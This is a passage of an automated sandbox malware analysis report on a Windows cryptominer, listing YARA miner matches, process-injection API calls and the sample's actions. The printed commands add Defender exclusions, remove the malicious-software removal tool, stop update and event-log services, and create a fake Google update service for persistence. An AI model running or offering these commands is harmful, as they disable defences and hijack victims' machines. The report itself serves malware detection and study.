          Source: lsass.exe, 00000024.00000002.3073692419.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735779276.00000202C024C000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074822998.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071949129.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735555511.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
          Source: lsass.exe, 00000024.00000000.1735534825.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3071732777.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.c
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.cPS0~
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~

          Spam, unwanted Advertisements and Ransom Demands

          Source: C:\Users\user\Desktop\file.exe | File written: C:\Windows\System32\drivers\etc\hosts

          System Summary

          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
          Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,25_2_00000001400010C0
          Source: C:\Windows\System32\winlogon.exe | Code function: 30_2_00000225DC6428C8 NtEnumerateValueKey,NtEnumerateValueKey,30_2_00000225DC6428C8
          Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000202C0AE202C NtQuerySystemInformation,StrCmpNIW,36_2_00000202C0AE202C
          Source: C:\Windows\System32\lsass.exe | Code function: 36_2_00000202C0AE253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,36_2_00000202C0AE253C
          Source: C:\Windows\System32\dwm.exe | Code function: 40_2_000002BAAEDB28C8 NtEnumerateValueKey,NtEnumerateValueKey,40_2_000002BAAEDB28C8
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,62_2_00000001400010C0
          Source: C:\Windows\System32\dialer.exe | Code function: 63_2_0000000140001394 NtResetWriteWatch,63_2_0000000140001394
          Source: C:\Windows\System32\svchost.exe | Code function: 69_2_000001845B3A202C NtQuerySystemInformation,StrCmpNIW,69_2_000001845B3A202C
          Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\TEMP\jxhirqfmeznn.sys
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_abowbhme.34k.ps1
          Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\jxhirqfmeznn.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: classification engine | Classification label: mal100.adwa.spyw.evad.mine.winEXE@87/15@1/1
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,25_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 62_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,62_2_000000014000226C
          Source: C:\Windows\System32\dialer.exe | Code function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,25_2_00000001400019C4
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3060:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6744:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6596:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2836:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2500:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5164:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5216:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
          Source: C:\Windows\System32\dialer.exe | Mutant created: \BaseNamedObjects\Global\tolfdedwfkhaxzps
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3164:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1780:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5040:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4504:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7032:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6740:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiopesf5.dnm.ps1
          Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\dialer.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\file.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\ProgramData\Google\Chrome\updater.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: file.exe | ReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
          Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
